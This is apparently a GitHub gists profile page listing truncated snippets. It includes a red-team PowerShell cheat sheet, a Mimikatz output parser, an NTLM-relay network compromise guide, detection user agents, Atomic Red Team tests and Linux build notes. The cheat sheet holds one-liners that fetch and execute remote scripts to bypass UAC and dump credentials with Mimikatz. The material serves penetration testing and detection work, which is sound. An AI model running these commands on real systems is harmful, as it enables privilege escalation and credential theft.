Skip to content

Instantly share code, notes, and snippets.

:electron:
living off the land!

EK_ jivoi

:electron:
living off the land!
Block or report user

Report or block jivoi

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gw_down.sh
#!/bin/bash
IF_IN="eth0"
IF_OUT="wlan0"
SUB="192.168.100"
echo "[+] Bringing interface ${IF_IN} down"
ip addr del ${SUB}.1/24 dev ${IF_IN}
ip link set dev ${IF_IN} down
echo "[+] Removing iptable rules"
View gw_up.sh
#!/bin/bash
IF_IN="eth0"
IF_OUT="wlan0"
SUB="192.168.100"
echo "[+] Creating DHCP server config."
cat <<EOF > /etc/dhcp/dhcp.${IF_IN}.conf
option routers ${SUB}.1;
option domain-name-servers ${SUB}.1;
default-lease-time 14440;
View One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
@jivoi
jivoi / pwn-o-magic.md
Created Jul 16, 2019 — forked from braimee/pwn-o-magic.md
Pwning internal networks automagically
View pwn-o-magic.md

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
View Native-Windows-Useragents-malicious.txt
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*
System.Net.WebClient.DownloadFile():
None
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first:
@jivoi
jivoi / AtomicTestsCommandLines.txt
Created Sep 5, 2018
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
View AtomicTestsCommandLines.txt
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
View RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
View update curl from source
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://curl.haxx.se/download/curl-7.60.0.tar.gz
tar xzf curl-7.60.0.tar.gz
./buildconf
./configure
checkinstall
dpkg -i /root/curl/curl-7.60.0/curl_7.60.0-1_amd64.deb
View ubuntu_18.04_mini_i3.md

Minimal i3 Ubuntu 18.04

TL,DR

A fully fonctional and good-looking linux for less than 256mb of ram

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash an usb drive with it as follow.

sudo dd bs=4M if=mini.iso of=/dev/sd<?> conv=fdatasync && sync
View gist:92b393ef168a8f5434bd7f4b527ab2b6
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://www.inet.no/dante/files/dante-1.4.2.tar.gz
./configure
make
sudo checkinstall
sudo dpkg -i dante_1.4.2-1_amd64.deb
# /etc/sockd.conf
# logoutput: syslog
You can’t perform that action at this time.